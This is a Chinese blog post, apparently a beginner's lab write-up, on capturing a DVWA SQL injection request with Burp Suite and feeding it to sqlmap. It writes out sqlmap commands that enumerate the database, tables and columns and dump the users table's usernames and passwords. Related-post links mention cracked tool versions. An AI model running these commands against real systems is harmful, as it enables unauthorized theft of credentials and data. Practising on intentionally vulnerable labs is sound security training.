使用burpsuite抓包 + sql工具注入 dvwa初级靶场

已于 2023-02-14 20:39:31 修改
阅读量2.2k 收藏 17
点赞数 1
分类专栏: web 文章标签: 网络 数据库 系统安全
于 2023-02-13 17:23:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/afanzcf/article/details/129013098
版权

使用burpsuite抓包 + sql工具注入 dvwa靶场

记录一下自己重新开始学习web安全之路②。

一、准备工作

1.工具准备 sqlmap + burpsuite

2.浏览器准备 火狐浏览器 + 设置代理。

首先,先设置一下火狐浏览器的代理

1

http代理地址为127.0.0.0.1 ,端口为8080

3.burpsuite 准备 将burpsuite的抓包功能打开。

注:burpsuite 不抓127.0.0.1 /dvwa-master的包,所以需要用本地网卡 ip/dvwa-master 访问

怎么查到本地网卡ip?

在cmd中输入ipconfig

2

得到本地网卡ip 192.168.92.1

如果是无线网,那么找无线网适配器的IPV4地址

3

通过本地网卡ip进入dvwa,把安全等级改为low等级,,设置代理之后。

4

在搜索框输入之后,点击submit。

通过burpsuite抓包得到

5

注:抓到的包必须是注入点的包

如:
(GET /dvwa-master/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1)即有?id=1,2等

然后在burpsuite中 点击Action — Save item 保存到本地。

保存之后,利用sqlmap工具。首先要在cmd中先来到sqlmap的文件路径下。

目标:拿账号密码(数据)

1.查询数据库的名称 (dvwa)

python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” --current-db

6

7

-r // 指定读取本地文件

–current-db //列出当前网站数据库名称

2.查询数据表的名称 (guestbook 、users)

python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” -D dvwa --tables

8

9

-D //指定数据库名称

–tables //数据表

3.查询数据列的名称 (user 、password)

python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” -D dvwa -T users --columns

10

11

-T //指定数据表的名称

–columns //列出数据列的名称

4.读取数据 (user、password)

python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” -D dvwa -T users -C user,password --dump

12

13

-C //指定数据列的名称

–dump // 读取数据

拿账号密码时遇到的问题:

1.首先是burpsuite抓包时 火狐浏览器显示

14

通过百度得到解决办法:

15

2.sqlmap,更新问题,可以不用管,但是一开始看到有警告,去官网下了一个新的sqlmap即可。

Afanbird
关注
  • 1
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
使用Burp爬取网站页面
WeiMengPing_的博客
06-27 644
Burp Suite是一款集成化的渗透测试工具,包含了很多功能,可以帮助我们高效地完成对Web应用程序的渗透测试和攻击。Burp Suite由Java语言编写,基于Java自身的跨平台性,使这款软件学习和使用起来更方便。Burp Suite不像其他自动化测试工具,它需要手工配置一些参数,触发一些自动化流程,然后才会开始工作。Burp Suite可执行程序是Java文件类型的jar文件,免费版可以从官网下载。
Burpsuite+1.7.26+Unlimited抓包改包发包工具
07-16
二.burp suite使用(一) --- 抓包,截包,改包 https://blog.csdn.net/jinzhichaoshuiping/article/details/47324955 1.设置浏览器-代理 127.0.0.1 8080 2.配置burp监听端口,打开burp-》Proxy-》options-》add 三...
Burpsuit抓包手工注入SQL
lucasde的博客
10-22 187
1723字节表示存在布尔盲注1677字节表示没有根据猜测得到的消息,数据库长度为8,且第一个字母是‘s',所以我们直接将数据包发送到intruder进行爆破,选择集束炸弹联合爆破去着剩下的数据库字母如果存在时间盲注,右下角的时间会变化,比如我加了0.3,成倍数增加的话,响应时间就是三秒左右,如果没有时间盲注,基本就是立马响应。同理,这个是POST型请求,所以得在下面的数据注入才行,然后同样的进行集束炸弹联合爆破,可以找到数据库的名称。
sqlmap工具使用详解及使用sqlmap检测SQL注入漏洞姿势
qq_67473072的博客
07-25 2785
sqlmap工具使用详解及使用sqlmap检测SQL注入漏洞姿势
真实sql注入以及小xss--BurpSuite联动sqlmap篇
最新发布
m0_68976043的博客
03-29 657
因此我尝试了注入,在order by 1和order by 2的时候是没有报错的,而3就有了证明一件事情,表格是两列,咱们暂且确定他是user列和password当然是我猜的。那就ok了,我们直接去sqlmap爆破即可,这里提示一个小点,BurpSuite联合sqlmap使用,将数据包导出来然后导入sqlmap目录下使用。首先我先去网站的robots.txt去看了看无意间发现很多资产。很明显我输入的已经到里面了,我们现在尝试更改命令为查询语句。而当我注入列的时候情况出现了。出现了报错,有报错必有注入点。
Burpsuite + DVWA 入门实战
LYSM
04-10 9811
Burpsuite 版本:2.0 浏览器:火狐 不再介绍怎么安装和激活 。 1.firefox代理设置 2.firefox的证书设置 url栏输入 http://burp,点击 CA Certificate 下载证书(放桌面就行) 导入证书 3.burpsuite的设置 然后就可以抓包了 注意抓包的时候浏览器打不开网页属于正常现象,如果需要继续浏览,点击“intercept is on”按钮即可...
网络安全-sql注入(5)】sqlmap以及几款自动化sql注入工具的详细使用过程(提供工具
m0_67844671的博客
10-03 2219
本篇文章详细介绍了sqlmap工具使用,如何用sqlmap进行自动化的SQL注入,还讲解了穿山甲,萝卜头等自动化SQL注入工具
dvwa中的文件上传漏洞
无痕的博客
01-12 7406
dvwa漏洞环境演示文件上传漏洞
渗透测试实验_使用BurpSuite暴力破解DVWA密码 BurpSuite四种暴力破解类型 安全等级Low Medium High
weixin_47133613的博客
03-16 8736
文章目录
抓包神器:burpsuite+教程
01-12
burpsuite是学习网络安全的必备软件,是一个开源的用于抓包的软件,下载文件后直接点击jar那个包就可以运行了,前提要求是一定要安装Java环境
BurpSuite.rar 抓包工具
06-16
BurpSuite 抓包工具 java
抓包工具 Analyzer 汉化破解版
10-30
HTTP_Analyzer_Full_Edition_v7.5.2.4540 汉化破解版
Burpsuite+1.7.26+Unlimited
05-05
IE选项--连接 页面中间选“从不进行拨号连接”,然后在 IE选项--连接--局域网设置里在“为LAN使用代理服务器”前的方框打勾,设置代理IP,端口 二.burp suite使用(一) - -- 抓包,截包,改包 ...
Burpsuite插件之logger++使用方法1
08-03
Burpsuite 插件-logger++使用方法By:裁决目录跟 http history 差不过,记录的更加全面了,字段也多了几个正常开代理就行,不用管,跟
文件上传漏洞(2)-----DVWA的学习
Z_Grant的博客
09-04 482
文章目录一,文件上传漏洞(1)原理(2)完成webshell的条件 一,文件上传漏洞 (1)原理 在互联网经常存在文件上传的功能。 文件上传漏洞是指用户上传了一个可执行的脚本件,并通过此脚本文件获得执行服务器命令的能力。 上传的文件是web脚本语言,服务器的web容器解释并执行了用户上传的脚本,导致代码执行,而容器搭建在操作系统上。故而可以达到执行系统命令的目的。 (2)完成webshell...
Burpsuite插件系列之sqlmap
2301_80115097的博客
10-18 751
1.启动Burp Suite,选择Extender–》BApp Store,搜索框搜索sqlmap选中SQLipy Sqlmap Integration如下图我们可以看到安装此插件所需环境依赖。发送到SQLipy Scan2.这里我们可以看到,插件自动提取了测试URL及Cookie等参数。喜欢的小伙伴点点关注,可留言想了解的相关知识包括但不限于(云计算、网络安全、数据安全等)2.这里我们可以看到,插件自动提取了测试URL及Cookie等参数。6.在安装好的插件中改为一样的端口,并启动。
Burp Suite暴力破解&DVAW环境部署
坏坏-5的博客
05-18 1663
本篇主要是关于Win Server 2003搭建DVWA靶场并且使用BurpSuite暴力破解的教程!
DVWA——暴力破解
qq_74806534的博客
01-06 4390
7.payload set和type选择如图,然后加载字典,可以用自己的,也可以用bp自带的字典,我这里选择bp自带的Directories-short.6.选择sniper狙击,然后点击clear$,清除bp自己选择的爆破位置,选择password后面的位置,点击add$.9.然后开始爆破,主要看长度不一样的,显然4765是我们想要的答案,直接点击。10.最后放包,回到dvwa,填写我们爆破的结果,可以看到我们成功了。8.下一步,点击options,先清屏,然后加入字段welcome。
dvwa抓不到本地包
qq_74848112的博客
11-21 879
我们新手在刚刚学习用dvwa和burp练习抓包的时候可能会出现抓不到包的问题。下面我来提供我的解决方法: 首先确保自己的浏览器代理和小皮是打开的。此时打开burp抓包是抓不到什么的。 原因就在这里 只需要将原本的localhost改成自己的本地IP就OK了。 本地IP查询方法: 首先win+r打开运行窗口,输入cmd 接着输入指令ipconfig 或者ipconfig/all 在显示出的内容中找到IPv4 地址 找到并复制之后,将loc
如何使用burpsuite抓包
07-27
使用Burp Suite进行抓包,您可以按照以下步骤进行操作: 1. 下载和安装Burp Suite:首先,您需要从PortSwigger官方网站下载并安装Burp Suite。他们提供了一个免费的社区版,供个人和小型团队使用。 2. 配置您的浏览器:为了使Burp Suite能够拦截和分析您的网络流量,您需要将浏览器的代理设置为Burp Suite的代理地址和端口。默认情况下,Burp Suite使用的代理地址是`localhost`,端口是`8080`。您可以在Burp Suite中的`Proxy`选项卡下找到这些设置。 3. 启动Burp Suite和浏览器:启动Burp Suite,并确保已经成功配置了代理设置。然后,启动您的浏览器,并开始浏览您想要抓包的网站。 4. 拦截和查看请求:当您通过浏览器发送请求时,Burp Suite会拦截这些请求并将其显示在其界面上的`Proxy`选项卡中。您可以在该选项卡中查看请求的详细信息,包括URL、头部、参数等。 5. 修改和重发请求:您可以对拦截到的请求进行修改,并使用Burp Suite重发它们。这对于测试应用程序的安全性和修改请求参数非常有用。 6. 拦截和查看响应:当服务器响应请求时,Burp Suite也会拦截这些响应并将其显示在`Proxy`选项卡中。您可以查看响应的详细信息,包括状态码、头部、内容等。 7. 使用其他Burp Suite功能:除了抓包功能之外,Burp Suite还提供了许多其他功能,如漏洞扫描、代理功能、重放攻击等。您可以根据需要探索并使用这些功能。 请注意,使用Burp Suite进行抓包可能涉及一些法律和道德问题。确保您在合法和授权的范围内使用它,并遵守适用的法律和规定。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值